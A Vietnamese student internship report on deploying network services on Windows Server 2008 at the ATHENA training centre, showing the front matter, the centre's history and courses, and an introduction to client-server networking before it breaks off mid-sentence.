30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
Report ver1-140815234705-phpapp01
1. ĐẠI HỌC CÔNG NGHIỆP
THÀNH PHỐ HỒ CHÍ MINH
KHOA CÔNG NGHỆ THÔNG
TIN
TRUNG TÂM
ĐÀO TẠO QUẢN TRỊ
MẠNG & AN NINH MẠNG
QUỐC TẾ ATHENA
BÁO CÁO ĐỀ TÀI THỰC TẬP
Nghiên cứu và phát triển các
dịch vụ trên windows server 2008
GVHD: Thầy Võ Đỗ Thắng
SVTH: Dương Minh Kha
MSSV: 12007375
TPHCM, ngày 25 tháng 3 năm 2015
2. TRUNG TÂM ĐÀO TẠO MẠNG VÀ
AN NINH MẠNG QUỐC TẾ ATHENA
CÔNG HÒA XÃ HỘI CHỦ NGHĨA VIỆT NAM
Độc lâp – Tự do – Hạnh phúc
NHIỆM VỤ THỰC HIỆN KHÓA LUẬN
Họ tên SV : Dương Minh Kha MSSV: 12007375
Chuyên ngành: Công Nghệ Thông Tin.
Tên đề tài: Nghiên cứu triển khai các dịch vụ mạng trên Windows Server 2008.
Nội dung thực hiện:
Lý thuyết:
Nắm vững các bước thực hiện quản trị Windows Server 2008.
Có khả năng tự thiết lập một mạng máy tính, cấu hình mạng, điều chỉnh khả
năng hoạt động mạng máy tính, vận hành hệ thống mạng, giải quyết sự cố, các
phương pháp bảo vệ.
Thực hành:
Cài đặt Windows Server 2008.
Nâng cấp Stand Alone thành Domain controller.
Cài đặt Windows 7.
Join Domain cho windows 7.
Tạo user account trên AD, thiết lập policy cho phép User được quyền thay đổi
ngày giờ hệ thống.
Backup cho Domain Controller.
Quản lý dịch vụ DNS, Mail, DHCP, Web, VPN trên môi trường Local và Internet.
Thực hiện kết nối VPN, Mail Server, Web Server trên máy chủ ảo VPS.
Bảo mật Windows với khai thác mã lỗi trên Windows Xp và trên VPS
Thời gian thực hiện: 14/1/2015 đến 6/04/2015.
Chữ ký của SV:
TP.HCM, Ngày 25 tháng 3 năm 2015
GIÁM ĐỐC TRUNG TÂM GIẢNG VIÊN HƯỚNG DẪN
(Ký và ghi rõ họ tên) (Ký và ghi rõ họ tên)
3. LỜI CẢM ƠN
Trên thực tế không có sự thành công nào mà không gắn liền với những sự hỗ
trợ, giúp đỡ dù ít hay nhiều, dù trực tiếp hay gián tiếp của người khác. Trong
suốt thời gian từ khi bắt đầu học tập ở giảng đường đến nay, em đã nhận được
rất nhiều sự quan tâm, giúp đỡ của quý Thầy Cô, gia đình và bạn bè. Với lời
biết ơn sâu sắc nhất, em xin gửi đến quý Thầy Cô ở Khoa Công Nghệ Thông Tin
– Trường Đại Học Công Nghiệp TPHCM đã cùng với tri thức và tâm huyết của
mình để truyền đạt vốn kiến thức quý báu cho chúng em trong suốt thời gian
học tập tại trường. Và đặc biệt, trong học kỳ này Khoa đã tổ chức cho chúng
em thực tập và được tiếp cận với môn học mà theo em là rất hữu ích đối với
sinh viên ngành Công Nghệ Thông Tin.
Em xin chân thành cảm ơn Thầy Võ Đỗ Thắng đã tận tâm hướng dẫn chúng em
qua từng buổi thực tập tại Trung Tâm ATHENA cũng như những buổi nói
chuyện, thảo luận. Nếu không có những lời hướng dẫn, dạy bảo của thầy thầy
thì em nghĩ bài báo cáo này của em rất khó có thể hoàn thiện được. Một lần
nữa, em xin chân thành cảm ơn thầy.
Bài báo cáo được thực hiện trong khoảng thời gian gần 2 tháng. Bước đầu đi
vào thực tế, tìm hiểu, kiến thức của em còn hạn chế và còn nhiều bỡ ngỡ. Do
vậy, không tránh khỏi những thiếu sót là điều chắc chắn, em rất mong nhận
được những ý kiến đóng góp quý báu của quý Thầy Cô và các bạn học cùng lớp
để kiến thức của em trong lĩnh vực này được hoàn thiện hơn.
Sau cùng, em xin kính chúc quý Thầy Cô trong Khoa Công Nghệ Thông Tin và
Thầy Võ Đỗ Thắng thật dồi dào sức khỏe, niềm tin để tiếp tục thực hiện sứ
mệnh cao đẹp của mình là truyền đạt kiến thức cho thế hệ mai sau.
Trân trọng.
TP.HCM, Ngày 25/03/2015
Sinh viên thực hiện
Dương Minh Kha
4. NHẬN XÉT CỦA ĐƠN VỊ THỰC TẬP
Họ và tên người hướng dẫn: ....................................................................................................
Nhận xét báo cáo thực tập của học sinh/sinh viên:.......................................................
Lớp: .......................................... Khóa:.............................................................................................
Tên báo cáo(đề tài)/nội dung báo cáo: ..........................................................................
Nội dung nhận xét:
..................................................................................................................................................................
..................................................................................................................................................................
..................................................................................................................................................................
..................................................................................................................................................................
.................................................................................................................................................................
.................................................................................................................................................................
..................................................................................................................................................................
..................................................................................................................................................................
Điểm (số):............................................................................................................................................
..................................................................................................................................................................
TP.Hồ Chí Minh ngày…..tháng…..năm 2015
Cán bộ hướng dẫn
5. NHẬN XÉT CỦA GIÁO VIÊN HƯƠNG DẪN
Họ và tên người hướng dẫn: .......................................................................................................
Nhận xét báo cáo thực tập của học sinh/sinh viên:..........................................................
Lớp: .......................................... Khóa:..............................................................................................
Tên báo cáo(đề tài)/nội dung báo cáo: ..................................................................................
.....................................................................
Nội dung nhận xét:
..................................................................................................................................................................
..................................................................................................................................................................
..................................................................................................................................................................
..................................................................................................................................................................
..................................................................................................................................................................
..................................................................................................................................................................
..................................................................................................................................................................
..................................................................................................................................................................
..................................................................................................................................................................
Điểm (số):.................... ................................................................................................................................
TP.Hồ Chí Minh ngày…..tháng…..năm 2015
GIÁO VIÊN HƯỚNG DẪN
6. MỤC LỤC
CHƯƠNG 1: CÔNG VIỆC THỰC TẬP. 10
I.Giới thiệu doanh nghiệp thực tập – Trung Tâm Đào Tạo Quản Trị Mạng và An
Ninh Mạng Quốc Tế ATHENA....................................................................................10
1. Trụ sở và các chi nhánh: 11
1.1. Trụ sở chính:............................................................................11
1.2. Cơ sở 2_Tại TP Hồ Chí Minh: ................................................11
2. Quá trình hình thành và phát triển của trung tâm: 11
3. Cơ cấu tổ chức: 5
4. Các sản phẩm, giải pháp: 5
4.1 Các khóa học dài hạn:................................................................. 5
4.2 Các khóa học ngắn hạn:.............................................................. 5
4.3 Các sản phẩm khác ..................................................................... 6
4.4 Cơ sở hạ tầng .............................................................................. 6
4.5 Các dịch vụ hỗ trợ:...................................................................... 6
5. Khách hàng 7
6. Đối tác 7
II. CÁC NHIỆM VỤ VÀ DỊCH VỤ CỦA BỘ PHẬN THỰC TẬP..................................7
III. CÔNG VIỆC VÀ NHIỆM VỤ ĐƯỢC PHÂN CÔNG..................................................7
IV. THỜI GIAN THỰC TẬP ..................................................................................................7
CHƯƠNG 2: NÔI DUNG THỰC TẬP. 8
I.Nhiệm vụ được giao............................................................................................................8
II.Kiến thức tìm hiểu .............................................................................................................8
1. Giải pháp mạng doanh nghiệp 8
7. 1.1. Giới thiệu về mạng doanh nghiệp.............................................. 8
1.2. Các thành phần công nghệ trong mạng doanh nghiệp............... 8
2. Windows Server 2008 9
Giới thiệu về mô hình Client-Server 9
CHƯƠNG 3: TỔNG QUAN VỀ WINDOWS SERVER 2008 12
I. GIỚI THIỆU WINDOWS SERVER 2008...................................................................12
II. CÁC TÍNH NĂNG CỦA WINDOWS SERVER 2008............................................13
1. Công cụ quản trị Server Manager 13
2. Windows Server Core 20
3. PowerShell 20
4. Windows Deloyment Services. 21
5. Terminal Services. 21
6. Network Access Protection 21
7. Read-Only Domain Controllers 22
8. Công nghệ Failover Clustering. 22
9. Windows Firewall with Advance Security 23
III. MỘT SỐ TÍNH NĂNG MỚI CỦA WINDOWS SERVER 2008........................23
1. Công nghệ ảo hóa Hyper-V 17
2. Processor Compatibility Mode 18
3. File Classification Infrastructure 18
4. Quản lý trong ỗ đĩa và file: 184
5. Cải tiến giao thức và mã hóa 18
6. Một số tính năng khác 19
8. IV. CÁC LỢI ÍCH CỦA WINDOWS SERVER 2008...................................................19
1. Web 19
2. Ảo hóa : 20
3. Bảo mật: 20
3.1. Network Access Protection (NAP):.........................................20
3.2. Read-Only Domain Controller (RODC): ................................21
3.3. BitLocker: ................................................................................21
3.4. Windows Firewall:...................................................................21
V. CÁC PHIÊN BẢN CỦA WINDOWS SERVER 2008 ............................................21
1. Windows Server 2008………………………………………….28
2. Windows Server 2008 Standard Edition 21
3. Windows Server 2008 Enterprise Edition 22
4. Windows Server 2008 Datacenter Edition 22
5. Windows Web Server 2008 29
CHƯƠNG 4: CÀI ĐẶT WINDOWS SERVER 2008 23
I. YÊU CẦU PHẦN CỨNG...................................................................................................23
II. CÁC CÁCH CÀI ĐẶT........................................................................................................24
III. NÂNG CẤP LÊN WINDOWS SERVER 2008........................................................24
IV. CÀI ĐẶT WINDOWS SERVER 2008.......................................................................25
CHƯƠNG 5: DỰNG DOMAIN CONTROLLER 30
CHƯƠNG 6: JOIN DOMAIN 39
9. CHƯƠNG 7: TRIỂN KHAI CÁC DỊCH VỤ MẠNG 43
I. DỊCH VỤ DNS .....................................................................................................................50
1. Giới thiệu về DNS 50
2. Cài đặt DNS 50
3. Cấu hình DNS 52
II. GIỚI THIỆU DỊCH VỤ DHCP.......................................................................................60
1. Hoạt động của giao thức 60
2. Cài đặt trên windows server 2008 61
3. Cấu hình DHCP 56
3.1. Tạo Scop .................................................................................56
3.2 Thay đổi options của Scope......................................................59
CHƯƠNG 8: TRIỂN KHAI VPN 68
I. Tìm hiểu VPN.....................................................................................................................68
1. Khái niệm. 69
2. Các loại VPN. 70
3.Bảo mật trong VPN 70
4.Sản phẩm công nghệ dành cho VPN 72
5. Bộ xử lý trung tâm VPN 72
6. Router dùng cho VPN 72
7. Tường lửa PIX của Cisco 72
II.VPN SITE TO SITE...........................................................................................................73
1. chuẩn bị: 73
2. Đặt IP cho 4 máy 73
3. Tiến hành cấu hình trên 2 server. 74
4. Kiểm tra. 88
10. CHƯƠNG 9: MAIL TRÊN VPS. 89
I. Cấu hình MDmoon v10..................................................................................................89
CHƯƠNG 10: BẢO MẬT WINDOWS. 150
I. Khai thác lỗ hổng trên Windows XP với mã lỗi MS10_024........................150
II. Khai thác lỗ hổng bảo mật Windows XP mã lỗi MS12_046 ......................153
CHƯƠNG 13: KẾT LUẬN 159
I.Các kết quả đạt được....................................................................................................159
II. Kinh nghiệm thực tế ..................................................................................................160
III. Hoàn thiện bản thân.................................................................................................160
IV. Các kiến thức được lĩnh hội ..................................................................................160
V. Kết luận............................................................................................................................160
VI. Kết quả đạt được………………………………………………………………………..119
VII. Tài liệu tham khảo...................................................................................................120
11. LỜI MỞ ĐẦU
Ngày nay với sự phát triển của khoa học kỹ thuật thì máy tính trở nên phổ
biến với mọi người. Chúng mang lại cho con người khả năng to lớn và làm
những công việc phi thường: tính toán nhanh và chính xác các bài toán phức
tạp, điều khiển tự động, giải trí… Máy tính ra đời không chỉ hỗ trợ trong sản
xuất mà còn trong việc học tập và làm góp phần giải phóng sức lao động. Máy
tính điện tử là một phát minh, thành tựu to lớn cho sự phát triển của nhân loại
góp phần thúc đẩy mạnh mẽ tiến bộ khoa học và kỹ thuật nói riêng cũng như
nhân loại nói chung.
Bên cạnh sự phát triển chóng mặt của máy tính trong thời buổi công
nghệ thông tin thì các ứng dụng, dịch vụ mạng là nền tản không thể tách rời.
Sức mạnh máy tính có thể nhân lên gấp nhiều lần khi được kết nối thành mạng
máy tính. Là cơ sở hạ tần cho phép trao đổi thông tin, truyền tải dữ liệu từ xa
nhằm rút ngắn khoảng cách. Với mạng máy tính toàn cầu chúng ta dễ dàng
tiếp cận với sự phát triển của thế giới trong đó có sự phát triển gần nhất của
Windows Server là Windows Server 2000 và Windows Server 2003 và tiếp
đến là Windows Server 2008 hỗ trợ tốt các dịch vụ mạng cần thiết trên Server,
việc cải tiến không ngừng giúp nâng cao tính ổn định và an toàn hơn cho
Windows Server 2008 hoạt động một cách trơn tru.
Hiện nay quá trình công nghiệp hóa hiện đại hóa đất nước là một chủ
trương hàng đầu của nhà nước. Mạng máy tính trở thành mục tiêu nghiên cứu
và phát triển. Cốt lõi là ngành công nghệ thông tin bao gồm nhiều lĩnh vực từ
kiến trúc mạng đến nguyên lý thiết kế, cài đặt mô hình ứng dụng v.v… Mạng
viễn thông nói chung và mạng máy tính trên nền tảng Windows Server 2008
nói riêng là công cụ hũu dụng không thể thiếu trong bộ máy nhà nước, trường
học, doanh nghiệp… Nó đóng vai trò cầu nối trao đổi thông tin giữa các chính
phủ, tổ chức xã hội và mọi người với nhau.
12. Qua thời gian học tập và nghiên cứu trên ghế nhà trường cùng với sự hỗ
trợ tận tình của Thầy cô, bạn bè và người thân đã giúp em thu thập được nhiều
kiến thức quý báo. Đặc biệt là quá trình thực tập tại Trung tâm ATHENA giúp
em có những trải nghiệm vô cùng thú vị và bổ ích. Với mong muốn tìm hiểu về
mạng máy tính và góp phần xây dựng một mạng máy tính thân thiện, thông
minh cho mọi người sử dụng.
Tuy đã có nhiều cố gắng song không thể tránh những khuyết điểm, sai
sót vì thế mong được sự thông cảm và những ý kiến đóng góp quý báo từ Quý
Thầy Cô, bạn bè, bạn đọc, người thân để em có thể ngày một hoàn thiện bản
thân mình hơn. Xin chân thành cảm ơn!
13. CHƯƠNG 1: CÔNG VIỆC THỰC TẬP.
I.Giới thiệu doanh nghiệp thực tập – Trung Tâm Đào Tạo Quản Trị
Mạng và An Ninh Mạng Quốc Tế ATHENA.
Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế
ATHENA_Tiền thân là Công ty TNHH Tư vấn và Đào tạo quản trị mạng Việt
Năng, (tên thương hiệu viết tắt là TRUNG TÂM ĐÀO TẠO ATHENA), được
chính thức thành lập theo giấy phép kinh doanh số 4104006757 của Sở Kế
Hoạch Đầu Tư Tp Hồ Chí Minh cấp ngày 04 tháng 11 năm 2008.
Tên công ty viết bằng tiếng nước ngoài: ATHENA ADVICE TRAINING
NETWORK SECURITY COMPANY LIMITED.
ATHENA là một tổ chức quy tụ nhiều trí thức trẻ Việt Nam đầy năng
động, nhiệt huyết và kinh nghiệm trong lĩnh vực công nghệ thông tin. Với
quyết tâm góp phần vào công cuộc thúc đẩy tiến trình tin học hóa của nước
nhà. ATHENA đã và đang tập trung chủ yếu vào các họat động sau:
Đào tạo chuyên sâu quản trị mạng, an ninh mạng, thương mại điện tử theo các
tiêu chuẩn quốc tế của các hãng nổi tiếng như Microsoft, Cisco, Oracle, Linux
LPI , CEH,... Song song đó, trung tâm ATHENA còn có những chương trình đào
tạo cao cấp dành riêng theo đơn đặt hàng của các đơn vị như Bộ Quốc Phòng,
Bộ Công An , ngân hàng, doanh nghiệp, các cơ quan chính phủ, tổ chức tài
chính..Qua đó cung cấp nguồn nhân lực trong lĩnh vực công nghệ thông tin, đặc
biệt là chuyên gia về mạng máy tính và bảo mật mạng đạt trình độ quốc tế cho
các tổ chức, doanh nghiệp có nhu cầu.
14. Tư vấn và hổ trợ cho doanh nghiệp ứng dụng hiệu quả tin học vào hoạt động
sản xuất kinh doanh.
Tiến hành các hoạt động nghiên cứu nâng cao kiến thức tin học và phát triển
cơ sở dữ liệu thông tin về các ứng dụng và sự cố mạng.
Tiến hành các dịch vụ ứng cứu khẩn cấp cho doanh nghiệp trong trường hợp
xảy ra sự cố máy tính.
Sau gần 10 năm hoạt động,nhiều học viên tốt nghiệp trung tâm ATHENA đã là
chuyên gia đảm nhận công tác quản lý hệ thống mạng, an ninh mạng cho nhiều bộ
ngành như Cục Công Nghệ Thông Tin - Bộ Quốc Phòng , Bộ Công An, Sở Thông
Tin Truyền Thông các tỉnh, bưu điện các tỉnh,…
Ngoài ra, Trung tâm ATHENA còn có nhiều chương trình hợp tác và trao đổi
công nghệ với nhiều đại học lớn như đại học Bách Khoa Thành Phố Hồ Chí Minh,
HọcViệnAn Ninh Nhân Dân( Thủ Đức), Học Viện Bưu Chính Viễn Thông, Hiệp
hội an toàn thông tin (VNISA), Viện Kỹ Thuật Quân Sự...
1. Trụ sở và các chi nhánh:
1.1. Trụ sở chính:
Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA.
Số 2 Bis Đinh Tiên Hoàng, Phường Đa Kao, Tp Hồ Chí Minh, Việt Nam.
Điện thoại: ( 84-8 ) 3824 4041
Hotline: 0943 23 00 99.
1.2.Cơ sở 2_Tại TP Hồ Chí Minh:
Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA
92 Nguyễn Đình Chiểu ,Phường Đa Kao,Quận 1, Tp Hồ Chí Minh, Việt Nam.
Website: www.athena.edu.vn
Điện thoại: ( 84-8 ) 2210 3801
Hotline: 0943 20 00 88.
15. 2.Quá trình hình thành và phát triển của trung tâm:
Một nhóm các thành viên là những doanh nhân tài năng và thành công trong lĩnh
vực công nghệ thông tin đã nhận ra tiềm năng phát triển của việc đào tạo nền công
nghệ thông tin nước nhà. Họ là những cá nhân có trình độ chuyên môn cao và có
đầu óc lãnh đạo cùng với tầm nhìn xa về tương lai của ngành công nghệ thông tin
trong tương lai, họ đã quy tụ được một lực lượng lớn đội ngũ công nghệ thông tin
trước hết là làm nhiệm vụ ứng cứu máy tính cho các doanh nghiệp, cá nhân có nhu
cầu. Bước phát triển tiếp theo là vươn tầm đào đạo đội ngũ cán bộ công nghệ
thông tin cho đất nước và xã hội.
Các thành viên sáng lập trung tâm gồm:
Ông Nguyễn Thế Đông: Cựu giám đốc trung tâm ứng cứu máy tính Athena,
hiện tại là giám đốc dự án của công ty Siemen Telecom.
Ông Hứa Văn Thế Phúc: Phó Giám đốc Phát triển Thương mại Công ty EIS,
Phó Tổng công ty FPT.
Ông Nghiêm Sỹ Thắng: Phó Tổng giám đốc Ngân hàng Liên Việt, chịu trách
nhiệm công nghệ thông tin của Ngân hàng.
Ông Võ Đỗ Thắng: Hiện đang là giám đốc Trung tâm đào tạo quản trị và an
ninh mạng Athena.
Đến năm 2003, bốn thành viên sáng lập cùng với với đội ngũ ứng cứu máy
tính gần 100 thành viên hoạt động như là một nhóm, một tổ chức ứng cứu máy
tính miền Nam.
Từ năm 2004- 2006: Trung tâm có nhiều bước phát triển và chuyển mình.
Trung tâm trở thành một trong những địa chỉ tin cậy của nhiều doanh nghiệp nhằm
cài đặt hệ thống an ninh mạng và đào tạo cho đội ngũ nhân viên của các doanh
nghiệp về các chương trình quản lý dự án MS Project 2003, kỹ năng thương mại
điện tử, bảo mật web… và là địa chỉ tin cậy của nhiều học sinh_sinh viên đến đăng
kí học. Đòi hỏi cấp thiết trong thời gian này của Trung tâm là nâng cao hơn nữa
đội ngũ giảng viên cũng như cơ sở để đáp ứng nhu cầu ngày càng cao về công
nghệ thông tin của đất nước nói chung, các doanh nghiệp, cá nhân nói riêng.Năm
2004, công ty mở rộng hoạt động cung cấp giải pháp, dịch vụ cho khu vực miền
Trung thông qua việc thành lập văn phòng đại diện tại Đà Nẵng.
16. Đến năm 2006: Trung tâm đào tạo quản trị và an ninh mạng Athena mở ra
thêm một chi nhánh tại Cư xá Nguyễn Văn Trỗi. Đồng thời tiếp tục tuyển dụng đội
ngũ giảng viên là những chuyên gia an ninh mạng tốt nghiệp các trường đại học và
học viện công nghệ thông tin uy tín trên toàn quốc, đồng thời trong thời gian này
Athena có nhiều chính sách ưu đãi nhằm thu hút đội ngũ nhân lực công nghệ
thông tin lành nghề từ các doanh nghiệp, tổ chức, làm giàu thêm đội ngũ giảng
viên của trung tâm.
Đến năm 2008: Hàng loạt các trung tâm đào tạo quản trị và an ninh mạng
mọc lên, cùng với khủng hoảng kinh tế tài chính toàn cầu đã làm cho Trung tâm
rơi vào nhiều khó khăn.
Ông Nguyễn Thế Đông cùng Ông Hứa Văn Thế Phúc rút vốn khỏi công ty gây
nên sự hoang man cho toàn bộ hệ thống trung tâm. Cộng thêm chi nhánh tại Cư xã
Nguyễn Văn Trỗi hoạt động không còn hiệu quả phải đóng cửa làm cho trung tâm
rơi từ khó khăn này đến khó khăn khác. Lúc này, với quyết tâm khôi phục lại công
ty cũng như tiếp tục sứ mạng góp phần vào tiến trình tin học hóa của đất nước.
Ông Võ Đỗ Thắng mua lại cổ phần của hai nhà đầu tư lên làm giám đốc và xây
dựng lại trung tâm. Đây là một bước chuyển mình có ý nghĩa chiến lược của trung
tâm. Mở ra một làn gió mới và một giai đoạn mới, cùng với quyết tâm mạnh mẽ và
một tinh thần thép đãgiúp ông Thắng vượt qua nhiều khó khăn ban đầu, giúp trung
tâm đứng vững trong thời kì khủng hoảng.
Từ năm 2009 – nay: Cùng với sự lãnh đạo tài tình và đầu óc chiến lược.
Trung tâm đào tạo quản trị và an ninh mạng dần được phục hồi và trở lại quỹ đạo
hoạt động của mình. Đến nay, Trung tâm đã trở thành một trong những trung tâm
đào tạo quản trị mạng hàng đầu Việt Nam.
Cùng với sự liên kết của rất nhiều công ty, tổ chức doanh nghiệp, trung tâm trở
thành nơi đào tạo và cung cấp nguồn nhân lực công nghệ thông tin cho xã hội.
Từng bước thực hiện mục tiêu góp phần vào tiến trình tin học hóa nước nhà.
17. 3.Cơ cấu tổ chức:
Hình 1. Sơ đồ tổ chức công ty.
4.Các sản phẩm, giải pháp:
4.1Các khóa học dài hạn:
- Chương trình đào tạo chuyên gia an ninh mạng. ( AN2S) Athena network
security specialist.
- Chương trình Quản trị viên an ninh mạng (ANST) Athena netuwork security
Technician.
- Chuyên viên quản trị mạng nâng cao (ANMA) Athena network manager
Administrator.
4.2Các khóa học ngắn hạn:
Khóa Quản trị mạng :
- Quản trị mạng Microsoft căn bản ACBN
- Phần cứng máy tính, laptop, server
- Quản trị hệ thống mạng Microsoft MCSA Security.
- Quản trị mạng Microsoft nâng cao MCSE
18. - Quản trị window Vista
- Quản trị hệ thống Window Server 2008, 2012
- Lớp Master Exchange Mail Server
- Quản trị mạng quốc tế Cissco CCNA
- Quản trị hệ thống mạng Linux 1 và Linux 2.
Khóa thiết kế web và bảo mật mạng
- Xây dựng, quản trị web thương mại điện tử với Joomla và VirtuMart
- Lập trình web với Php và MySQL
- Bảo mật mạng quốc tế ACNS
- Hacker mũ trắng
- Athena Mastering Firewall Security
- Bảo mật website.
4.3 Các sản phẩm khác
- Chuyên đề thực hành sao lưu và phục hồi dữ liệu
- Chuyên đề thực hành bảo mật mạng Wi_Fi
- Chuyên đề Ghost qua mạng
- Chuyên đề xây dựng và quản trị diễn đàn
- Chuyên đề bảo mật dữ liệu phòng chống nội gián
- Chuyên đề quản lý tài sản công nghệ thông tin
- Chuyên đề kỹ năng thương mại điện tử.
4.4 Cơ sở hạ tầng
- Thiết bị đầy đủ và hiện đại.
- Chương trình cập nhật liên tục, bảo đảm học viên luôn tiếp cận với những
công nghệ mới nhất.
- Phòng máy rộng rãi, thoáng mát.
4.5 Các dịch vụ hỗ trợ:
- Đảm bảo việc làm cho học viên tốt nghiệp khoá dài hạn
19. - Giới thiệu việc làm cho mọi học viên
- Thực tập có lương cho học viên khá giỏi
- Ngoài giờ học chính thức, học viên được thực hành thêm miễn phí, không
giới hạn thời gian
- Hỗ trợ kỹ thuật không thời hạn trong tất cả các lĩnh vực liên quan đến máy
tính, mạng máy tính, bảo mật mạng
Hỗ trợ thi Chứng chỉ Quốc tế.
5.Khách hàng
- Mọi đối tượng chuyên hoặc không chuyên về CNTT.
- Khách hàng chủ yếu của ATHENAlà các bạn học sinh, sinh viên và các cán bộ
công nhân viên chức yêu thích lĩnh vực công nghệ thông tin.
6.Đối tác
Trung tâm đào tạo an ninh mạng ATHENA là đối tác đào tạo & cung cấp
nhân sự CNTT, quản trị mạng , an ninh mạng chất lượng cao theo đơn đặt
hàng cho các đơn vị như ngân hàng, doanh nghiệp, các cơ quan chính phủ,
tổ chức tài chính...
II.CÁC NHIỆM VỤ VÀ DỊCH VỤ CỦA BỘ PHẬN THỰC TẬP
Bộ phận thực tập : Bộ phận triển khai kỹ thuật.
Nhiệm vụ và dịch vụ:
Triển khai lắp đặt hệ thống mạng.
Bảo trì hệ thống mạng.
Tư vấn hỗ trợ quản trị hệ thống mạng.
III.CÔNG VIỆC VÀ NHIỆM VỤ ĐƯỢC PHÂN CÔNG
Nghiên cứu các dịch vụ mạng trên Windows Server 2008.
Triển khai các dịch vụ mạng trên Windows Server 2008.
Yêu cầu nhiệm vụ: Có kiến thức tốt về Network, System, Security.
IV.THỜI GIAN THỰC TẬP
Từ ngày 14/01/2015 đến ngày 6/04/2015.
20. CHƯƠNG 2: NÔI DUNG THỰC TẬP.
I.Nhiệm vụ được giao.
Nghiên cứu các dịch vụ mạng trên Windows Server 2008
Triển khai các dịch vụ mạng trên Windows Server 2008
II.Kiến thức tìm hiểu
1.Giải pháp mạng doanh nghiệp
1.1.Giới thiệu về mạng doanh nghiệp
Hệ thống mạng của doanh nghiệp đơn giản hay phức tạp là tùy theo quy
mô và loại hình của doanh nghiệp. Ngày nay, các nhà cung ứng đã đưa ra rất
nhiều sự chọn lựa cho doanh nghiệp như cho phép doanh nghiệp tự trang bị, tự
quản lý hoặc sử dụng dịch vụ. Những doanh nghiệp lớn với hàng ngàn máy tính
cũng có những giải pháp quản lý đặc thù kết hợp cả phần cứng và phần mềm.
Hầu hết các doanh nghiệp đều có nhu cầu sử dụng các ứng dụng công nghệ
thông tin (CNTT) ở những mức độ khác nhau. Do vậy, họ sẽ có những nhu cầu
khác nhau về quản trị hệ thống mạng (network) của doanh nghiệp. Một hệ
thống được kiểm soát tốt sẽ làm giảm đáng kể chi phí hoạt động, nâng cao hiệu
quả cũng như độ tin cậy của hệ thống.
1.2.Các thành phần công nghệ trong mạng doanh nghiệp
Tùy vào qui mô lớn hay nhỏ của doanh nghiệp mà ta sẽ có những giải
pháp công nghệ và thiết kế sao cho phù hợp nhất.
21. Hiện nay, hầu hết các ứng dụng mới đều yêu cầu rất nhiều tài nguyên của hệ
thống và băng thông mạng, cũng như các yêu cầu về điều khiển, giám sát mạng.
Vậy làm thế nào để một doanh nghiệp vừa và nhỏ, với một số vốn đầu tư ban
đầu hạn chế, có thể tiếp cận được với các công nghệ hiện đại, bắt kịp sự phát
triển của thế giới.
2.Windows Server 2008
Giới thiệu về mô hình Client-Server
Điều đáng ngạc nhiên là nhiều công ty ngày nay vẫn không quan tâm đến
việc thực hiện một mạng lưới client/server. Thay vào đó họ chỉ tiếp tục thêm
vào các máy trạm để thực hiện mô hình mạng peer-to-peer. Mạng peer-to-peer
không cung cấp cho bạn nhiều cách bảo mật và chia sẽ tài nguyên. Vì vậy, không
có gì ngạc nhiên khi họ thường có vấn đề với việc truy cập vào máy trạm, bị mất
dữ liệu do virus, spyware hay phải trải nghiệm việc internet bị gián đoạn. Máy
tính nối mạng theo mô hình peer-to-peer là đủ khi bạn chỉ có một vài người
dung trên mạng, nhưng khi có nhiều hơn 5 hoặc 6
người sử dụng trên mạng của bạn, bạn thực sự phải xem xét đầu tư một máy
chủ mạng.Vậy lợi ích của mô hình Client-Server cụ thể là gì?
- Tập tin và an ninh mạng: Vai trò quan trọng nhất của một máy chủ tập tin là
an ninh mạng mà nó cung cấp. Bằng cách tạo ra các tài khoản người dùng cá
nhân và nhóm, có thể cấp quyền cho nhóm và cá nhân khai thác dữ liệu được
lưu trữ trên mạng, ngăn chặn người sử dụng trái phép truy cập tài liệu mà họ
không nên xem. Ví dụ, trong Folder chung thì group ketoan và group nhansu có
quyền truy cập ủa nhân viên…
22. - Tăng độ tin cậy, giảm sự gián đoạn công việc: Nhiều máy chủ được trang bị
nguồn điện dự phòng. Với một nguồn cung cấp năng lượng thứ cấp chạy song
song, sự mất mát của một trong những nguồn cung cấp điện không ảnh hưởng
đến hoạt động hệ thống bình thường. Cũng vậy với hệ thống lưu trữ của máy
chủ. Không giống như một máy tính để bàn trung bình có sử dụng một ổ cứng
duy nhất, một máy chủ sẽ thường sử dụng nhiều ổ đĩa cứng làm việc trong một
RAID cấu hình để ngăn ngừa mất dữ liệu hoặc một sự gián đoạn trong quy trình
làm việc. Ngoài ra, nhiều máy chủ cũng được trang bị ổ đĩa cứng hot swappable
và nguồn cung cấp điện. Các thành phần này có thể thay thế nóng cho phép bạn
thay thế phần cứng bị lỗi mà không gián đoạn toàn bộ văn phòng. Ngoài ra, kể
từ khi tất cả các dữ liệu nhân viên đang được lưu trữ trên mạng, nếu máy trạm
của người dùng không giữa ngày làm việc, nhân viên có thể truy cập các tập tin
tương tự từ máy trạm khác.
-
- Tập trung lưu trữ dữ liệu và tài nguyên chia sẻ: Với một máy chủ mạng, tất
cả người dùng trên mạng có thể sử dụng các tài nguyên mạng khác nhau ngay
từ bàn làm việc, tăng hiệu quả. Một số trong những nguồn tài nguyên bao gồm:
o Tập trung lưu trữ dữ liệu ( RAID Array )
o Network Attached Storage (NAS) thiết bị
o Tháp đĩa CD / DVD
o Máy in và máy chủ Fax
- Quản lý virus : Một trong những mối đe dọa lớn nhất đối với mạng của bạn là
khả năng lây nhiễm từ virus, phần mềm gián điệp và thư rác. Vì vậy, có tốt, cập
nhật, phần mềm chống virus được cài đặt trên hệ thống của bạn là một điều cần
thiết.
23. Trong một văn phòng của 10 người hoặc ít hơn, hệ thống có thể được duy trì
riêng. Bất cứ điều gì nhiều hơn thế, tuy nhiên, có thể trở thành một gánh nặng
thực sự.
Trong những trường hợp này, một gói phần mềm chống virus kết hợp máy
trạm và bảo vệ chống virus máy chủ vào một giải pháp duy nhất có ý nghĩa hơn.
- Sao lưu tập trung: Tất cả các doanh nghiệp nên sao lưu dữ liệu của họ một
cách thường xuyên. Bởi có tất cả các công ty của bạn và dữ liệu nhân viên được
lưu trữ tại một địa điểm, bản sao lưu có thể được thực hiện đáng tin cậy và
nhanh chóng. Vì vậy, bạn sẽ không bao giờ cần phải lo lắng về những dữ liệu
được lưu trữ trên những gì máy trạm như bạn làm trong một mạng peer-to-
